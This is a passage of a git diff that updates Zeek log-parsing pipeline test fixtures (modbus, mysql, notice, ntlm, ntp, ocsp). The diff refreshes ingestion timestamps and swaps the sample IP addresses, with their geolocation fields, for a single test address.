b/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json index 137a3407a15..75a6af9f1ea 100644 --- a/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json +++ b/packages/zeek/data_stream/modbus/_dev/test/pipeline/test-modbus.log-expected.json @@ -28,7 +28,7 @@ "ip": "192.168.1.10" }, "event": { - "ingested": "2021-08-11T19:18:31.350123900Z", + "ingested": "2021-12-09T13:51:04.835055300Z", "original": "{\"ts\":1352718265.222457,\"uid\":\"CpIIXl4DFGswmjH2bl\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":64342,\"id.resp_h\":\"192.168.1.164\",\"id.resp_p\":502,\"func\":\"READ_COILS\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -96,7 +96,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:31.350139100Z", + "ingested": "2021-12-09T13:51:04.835060100Z", "original": "{\"ts\":1352718265.222457,\"uid\":\"CpIIXl4DFGswmjH2bl\",\"id.orig_h\":\"192.168.1.10\",\"id.orig_p\":64342,\"id.resp_h\":\"192.168.1.164\",\"id.resp_p\":502,\"func\":\"READ_COILS\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json b/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json index ec10a8761ba..5c5b27bc714 100644 --- a/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json +++ b/packages/zeek/data_stream/mysql/_dev/test/pipeline/test-mysql.log-expected.json @@ -30,7 +30,7 @@ "ip": "192.168.0.254" }, "event": { - "ingested": "2021-08-11T19:18:31.843442400Z", + "ingested": "2021-12-09T13:51:05.144926100Z", "original": "{\"ts\":1216281087.437392,\"uid\":\"C5Hol527kLMUw36hj3\",\"id.orig_h\":\"192.168.0.254\",\"id.orig_p\":56162,\"id.resp_h\":\"192.168.0.254\",\"id.resp_p\":3306,\"cmd\":\"query\",\"arg\":\"select count(*) from foo\",\"success\":true,\"rows\":1}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -102,7 +102,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:31.843456600Z", + "ingested": "2021-12-09T13:51:05.144933200Z", "original": "{\"ts\":1216281087.437392,\"uid\":\"C5Hol527kLMUw36hj3\",\"id.orig_h\":\"192.168.0.254\",\"id.orig_p\":56162,\"id.resp_h\":\"192.168.0.254\",\"id.resp_p\":3306,\"cmd\":\"query\",\"arg\":\"select count(*) from foo\",\"success\":true,\"rows\":1}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log index 1076bcaf26f..260de7d206d 100644 --- a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log +++ b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log @@ -1,5 +1,5 @@ {"ts":1320435875.879278,"note":"SSH::Password_Guessing","msg":"172.16.238.1 appears to be guessing SSH passwords (seen in 30 connections).","sub":"Sampled servers: 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136","src":"172.16.238.1","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} -{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s","sub":"remote","src":"8.42.77.171","dst":"207.154.238.205","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} +{"ts":1551393388.426472,"note":"Scan::Port_Scan","msg":"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s","sub":"remote","src":"89.160.20.156","dst":"89.160.20.156","peer_descr":"bro","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0,"dropped":false} {"ts":1617097740.958466,"note":"CaptureLoss::Too_Much_Loss","msg":"The capture loss script detected an estimated loss rate above 88.306%","actions":["Notice::ACTION_LOG"],"suppress_for":3600.0} -{"ts":1617097929.601155,"uid":"CmvrSS1wIiuOGYCbfi","id.orig_h":"10.156.0.2","id.orig_p":48818,"id.resp_h":"104.154.89.105","id.resp_p":443,"fuid":"F39b0Bdfm3FW1rNS5","proto":"tcp","note":"SSL::Invalid_Server_Cert","msg":"SSL certificate validation failed with (self signed certificate)","sub":"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US","src":"10.156.0.2","dst":"104.154.89.105","p":443,"actions":["Notice::ACTION_LOG"],"suppress_for":3600.0} -{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s\",\"sub\":\"remote\",\"src\":\"8.42.77.171\",\"dst\":\"207.154.238.205\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/notice.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} +{"ts":1617097929.601155,"uid":"CmvrSS1wIiuOGYCbfi","id.orig_h":"10.156.0.2","id.orig_p":48818,"id.resp_h":"89.160.20.156","id.resp_p":443,"fuid":"F39b0Bdfm3FW1rNS5","proto":"tcp","note":"SSL::Invalid_Server_Cert","msg":"SSL certificate validation failed with (self signed certificate)","sub":"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US","src":"10.156.0.2","dst":"89.160.20.156","p":443,"actions":["Notice::ACTION_LOG"],"suppress_for":3600.0} +{"preview":false,"offset":0,"result":{"_bkt":"main~0~0758E7C3-1D0C-4B2B-8CF0-682BFEA86CDC","_cd":"0:12","_indextime":"1608752616","_raw":"{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s\",\"sub\":\"remote\",\"src\":\"89.160.20.156\",\"dst\":\"89.160.20.156\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}","_serial":"0","_si":["b590508aafed","main"],"_sourcetype":"access_log-too_small","_time":"2020-12-23 19:43:35.000 UTC","host":"Lees-MBP.localdomain","index":"main","linecount":"1","my_max":"1608759317","source":"/usr/local/var/log/zeek/notice.log","sourcetype":"access_log-too_small","splunk_server":"b590508aafed"}} diff --git a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json index 37d46b92c2e..491f17eabb2 100644 --- a/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json +++ b/packages/zeek/data_stream/notice/_dev/test/pipeline/test-notice.log-expected.json @@ -32,7 +32,7 @@ "ip": "172.16.238.1" }, "event": { - "ingested": "2021-08-11T19:18:32.286947900Z", + "ingested": "2021-12-09T13:51:05.490792100Z", "original": "{\"ts\":1320435875.879278,\"note\":\"SSH::Password_Guessing\",\"msg\":\"172.16.238.1 appears to be guessing SSH passwords (seen in 30 connections).\",\"sub\":\"Sampled servers: 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136, 172.16.238.136\",\"src\":\"172.16.238.1\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" @@ -55,35 +55,34 @@ }, "related": { "ip": [ - "8.42.77.171", - "207.154.238.205" + "89.160.20.156" ] }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 14061, + "number": 29518, "organization": { - "name": "DigitalOcean, LLC" + "name": "Bredband2 AB" } }, - "address": "207.154.238.205", - "ip": "207.154.238.205" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "zeek": { "notice": { - "msg": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s", + "msg": "89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s", "suppress_for": 3600.0, "note": "Scan::Port_Scan", "sub": "remote", @@ -96,33 +95,33 @@ }, "rule": { "name": "Scan::Port_Scan", - "description": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s" + "description": "89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CO", - "city_name": "Longmont", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Colorado", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -105.1624, - "lat": 40.1559 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 393552, + "number": 29518, "organization": { - "name": "Longmont Power \u0026 Communications" + "name": "Bredband2 AB" } }, - "address": "8.42.77.171", - "ip": "8.42.77.171" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-08-11T19:18:32.286998400Z", - "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s\",\"sub\":\"remote\",\"src\":\"8.42.77.171\",\"dst\":\"207.154.238.205\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", + "ingested": "2021-12-09T13:51:05.490800300Z", + "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s\",\"sub\":\"remote\",\"src\":\"89.160.20.156\",\"dst\":\"89.160.20.156\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" ], @@ -157,7 +156,7 @@ "description": "The capture loss script detected an estimated loss rate above 88.306%" }, "event": { - "ingested": "2021-08-11T19:18:32.287007500Z", + "ingested": "2021-12-09T13:51:05.490806100Z", "original": "{\"ts\":1617097740.958466,\"note\":\"CaptureLoss::Too_Much_Loss\",\"msg\":\"The capture loss script detected an estimated loss rate above 88.306%\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0}", "category": [ "intrusion_detection" @@ -175,25 +174,26 @@ { "destination": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 15169, + "number": 29518, "organization": { - "name": "Google LLC" + "name": "Bredband2 AB" } }, - "address": "104.154.89.105", + "address": "89.160.20.156", "port": 443, - "ip": "104.154.89.105" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CmvrSS1wIiuOGYCbfi", @@ -222,7 +222,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:epLQwe8pc8f0Ay9N+VzTshscAGE=", + "community_id": "1:Dff30r1qWk7lVgWVwXvU4AAuxU8=", "transport": "tcp" }, "@timestamp": "2021-03-30T09:52:09.601Z", @@ -232,12 +232,12 @@ "related": { "ip": [ "10.156.0.2", - "104.154.89.105" + "89.160.20.156" ] }, "event": { - "ingested": "2021-08-11T19:18:32.287015500Z", - "original": "{\"ts\":1617097929.601155,\"uid\":\"CmvrSS1wIiuOGYCbfi\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":48818,\"id.resp_h\":\"104.154.89.105\",\"id.resp_p\":443,\"fuid\":\"F39b0Bdfm3FW1rNS5\",\"proto\":\"tcp\",\"note\":\"SSL::Invalid_Server_Cert\",\"msg\":\"SSL certificate validation failed with (self signed certificate)\",\"sub\":\"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US\",\"src\":\"10.156.0.2\",\"dst\":\"104.154.89.105\",\"p\":443,\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0}", + "ingested": "2021-12-09T13:51:05.490811700Z", + "original": "{\"ts\":1617097929.601155,\"uid\":\"CmvrSS1wIiuOGYCbfi\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":48818,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"fuid\":\"F39b0Bdfm3FW1rNS5\",\"proto\":\"tcp\",\"note\":\"SSL::Invalid_Server_Cert\",\"msg\":\"SSL certificate validation failed with (self signed certificate)\",\"sub\":\"CN=*.badssl.com,O=BadSSL,L=San Francisco,ST=California,C=US\",\"src\":\"10.156.0.2\",\"dst\":\"89.160.20.156\",\"p\":443,\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "alert", "id": "CmvrSS1wIiuOGYCbfi", @@ -258,28 +258,28 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "DE-HE", - "city_name": "Frankfurt am Main", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Hesse", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 8.6843, - "lat": 50.1188 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 14061, + "number": 29518, "organization": { - "name": "DigitalOcean, LLC" + "name": "Bredband2 AB" } }, - "address": "207.154.238.205", - "ip": "207.154.238.205" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "zeek": { "notice": { - "msg": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s", + "msg": "89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s", "suppress_for": 3600.0, "note": "Scan::Port_Scan", "sub": "remote", @@ -292,29 +292,29 @@ }, "rule": { "name": "Scan::Port_Scan", - "description": "8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s" + "description": "89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-CO", - "city_name": "Longmont", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Colorado", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -105.1624, - "lat": 40.1559 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 393552, + "number": 29518, "organization": { - "name": "Longmont Power \u0026 Communications" + "name": "Bredband2 AB" } }, - "address": "8.42.77.171", - "ip": "8.42.77.171" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tags": [ "preserve_original_event" @@ -325,16 +325,15 @@ }, "related": { "ip": [ - "8.42.77.171", - "207.154.238.205" + "89.160.20.156" ] }, "host": { "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:32.287021600Z", - "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"8.42.77.171 scanned at least 15 unique ports of host 207.154.238.205 in 0m0s\",\"sub\":\"remote\",\"src\":\"8.42.77.171\",\"dst\":\"207.154.238.205\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", + "ingested": "2021-12-09T13:51:05.490817200Z", + "original": "{\"ts\":1551393388.426472,\"note\":\"Scan::Port_Scan\",\"msg\":\"89.160.20.156 scanned at least 15 unique ports of host 89.160.20.156 in 0m0s\",\"sub\":\"remote\",\"src\":\"89.160.20.156\",\"dst\":\"89.160.20.156\",\"peer_descr\":\"bro\",\"actions\":[\"Notice::ACTION_LOG\"],\"suppress_for\":3600.0,\"dropped\":false}", "category": [ "intrusion_detection" ], diff --git a/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json b/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json index d4799184331..5b7004c6c83 100644 --- a/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json +++ b/packages/zeek/data_stream/ntlm/_dev/test/pipeline/test-ntlm.log-expected.json @@ -48,7 +48,7 @@ ] }, "event": { - "ingested": "2021-08-11T19:18:32.998197400Z", + "ingested": "2021-12-09T13:51:06.115477800Z", "original": "{\"ts\":1508959117.814467,\"uid\":\"CHphiNUKDC20fsy09\",\"id.orig_h\":\"192.168.10.50\",\"id.orig_p\":46785,\"id.resp_h\":\"192.168.10.31\",\"id.resp_p\":445,\"username\":\"JeffV\",\"hostname\":\"ybaARon55QykXrgu\",\"domainname\":\"contoso.local\",\"server_nb_computer_name\":\"VICTIM-PC\",\"server_dns_computer_name\":\"Victim-PC.contoso.local\",\"server_tree_name\":\"contoso.local\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -123,7 +123,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-08-11T19:18:32.998209300Z", + "ingested": "2021-12-09T13:51:06.115485200Z", "original": "{\"ts\":1508959117.814467,\"uid\":\"CHphiNUKDC20fsy09\",\"id.orig_h\":\"192.168.10.50\",\"id.orig_p\":46785,\"id.resp_h\":\"192.168.10.31\",\"id.resp_p\":445,\"username\":\"JeffV\",\"hostname\":\"ybaARon55QykXrgu\",\"domainname\":\"contoso.local\",\"server_nb_computer_name\":\"VICTIM-PC\",\"server_dns_computer_name\":\"Victim-PC.contoso.local\",\"server_tree_name\":\"contoso.local\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log index 9799c888dba..98c494dec42 100644 --- a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log +++ b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log @@ -1,2 +1,2 @@ -{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0} -{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"130.118.205.62","id.orig_p":38461,"id.resp_h":"208.79.89.249","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0} +{"ts":1602116947.977,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"89.160.20.156","id.orig_p":38461,"id.resp_h":"89.160.20.156","id.resp_p":123,"version":4,"mode":3,"stratum":0,"poll":1,"precision":1,"root_delay":0,"root_disp":0,"ref_id":"\\x00\\x00\\x00\\x00","ref_time":0,"org_time":0,"rec_time":0,"xmt_time":1602116947.215,"num_exts":0} +{"ts":1602116948.081,"uid":"CqlPpF1AQVLMPgGiL5","id.orig_h":"89.160.20.156","id.orig_p":38461,"id.resp_h":"89.160.20.156","id.resp_p":123,"version":4,"mode":4,"stratum":2,"poll":8,"precision":5.960464477539063e-8,"root_delay":0.00921630859375,"root_disp":0.0212249755859375,"ref_id":"127.67.113.92","ref_time":1602116655.942,"org_time":1602116947.215,"rec_time":1602116947.964,"xmt_time":1602116947.964,"num_exts":0} diff --git a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json index d89a329fbab..d396a03c1e0 100644 --- a/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json +++ b/packages/zeek/data_stream/ntp/_dev/test/pipeline/test-ntp.log-expected.json @@ -7,29 +7,31 @@ }, "related": { "ip": [ - "130.118.205.62", - "208.79.89.249" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 25795, + "number": 29518, "organization": { - "name": "ARP NETWORKS, INC." + "name": "Bredband2 AB" } }, - "address": "208.79.89.249", + "address": "89.160.20.156", "port": 123, - "ip": "208.79.89.249" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CqlPpF1AQVLMPgGiL5", @@ -51,21 +53,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } }, - "address": "130.118.205.62", + "address": "89.160.20.156", "port": 38461, - "ip": "130.118.205.62" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-08-26T12:37:14.367022936Z", - "original": "{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}", + "ingested": "2021-12-09T13:51:06.504150200Z", + "original": "{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38461,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CqlPpF1AQVLMPgGiL5", @@ -81,7 +92,7 @@ ], "network": { "protocol": "ntp", - "community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=", + "community_id": "1:8alLEvkgWQ2DN8cL1UQ7Gupfwe4=", "transport": "udp", "type": "ipv4" } @@ -93,29 +104,31 @@ }, "related": { "ip": [ - "130.118.205.62", - "208.79.89.249" + "89.160.20.156" ] }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 25795, + "number": 29518, "organization": { - "name": "ARP NETWORKS, INC." + "name": "Bredband2 AB" } }, - "address": "208.79.89.249", + "address": "89.160.20.156", "port": 123, - "ip": "208.79.89.249" + "ip": "89.160.20.156" }, "zeek": { "session_id": "CqlPpF1AQVLMPgGiL5", @@ -137,21 +150,30 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 17.8167, + "lat": 59.2 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } }, - "address": "130.118.205.62", + "address": "89.160.20.156", "port": 38461, - "ip": "130.118.205.62" + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-08-26T12:37:14.367053691Z", - "original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"130.118.205.62\",\"id.orig_p\":38461,\"id.resp_h\":\"208.79.89.249\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}", + "ingested": "2021-12-09T13:51:06.504154100Z", + "original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38461,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", "id": "CqlPpF1AQVLMPgGiL5", @@ -167,7 +189,7 @@ ], "network": { "protocol": "ntp", - "community_id": "1:IDiKR+C1G8mk7LQhFpp+4p1tHrk=", + "community_id": "1:8alLEvkgWQ2DN8cL1UQ7Gupfwe4=", "transport": "udp", "type": "ipv4" } diff --git a/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json b/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json index 2fa4e14ea90..1884e9707ab 100644 --- a/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json +++ b/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json @@ -27,7 +27,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:33.502421100Z", + "ingested": "2021-12-09T13:51:07.066331400Z", "original": "{\"ts\":1307712421.847886,\"id\":\"FSEWoS3ff8FcTn3WLf\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"14A7E219F46B93E141258F08BC85764671F136B0\",\"issuerKeyHash\":\"EEDD79C0D379B04D7E47BC70A6E7C62AAEBADEC9\",\"serialNumber\":\"9239D5348F40D1695A745470E1F23F43\",\"certStatus\":\"revoked\",\"revoketime\":1300220120.0,\"thisUpdate\":1307640343.0,\"nextUpdate\":1307985943.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event" @@ -63,7 +63,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:33.502432100Z", + "ingested": "2021-12-09T13:51:07.066340100Z", "original": "{\"ts\":1307562416.100084,\"id\":\"FdZBFMEYgAErVhoC8\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"6C2BC55AAF8D96BF60ADF81D023F23B48A0059C2\",\"issuerKeyHash\":\"A5EF0B11CEC04103A34A659048B21CE0572D7D47\",\"serialNumber\":\"30119E6EF41BDBA3FEFE711DBE8F6191\",\"certStatus\":\"good\",\"thisUpdate\":1307549998.0,\"nextUpdate\":1308154798.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event" @@ -107,7 +107,7 @@ } }, "event": { - "ingested": "2021-08-11T19:18:33.502439800Z", + "ingested": "2021-12-09T13:51:07.066346600Z", "original": "{\"ts\":1307562416.100084,\"id\":\"FdZBFMEYgAErVhoC8\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"6C2BC55AAF8D96BF60ADF81D023F23B48A0059C2\",\"issuerKeyHash\":\"A5EF0B11CEC04103A34A659048B21CE0572D7D47\",\"serialNumber\":\"30119E6EF41BDBA3FEFE711DBE8F6191\",\"certStatus\":\"good\",\"thisUpdate\":1307549998.0,\"nextUpdate\":1308154798.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event" diff --git a/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json b/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json index 1ecdfd1c4df..099784ba16d 100644 --- a/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json +++ 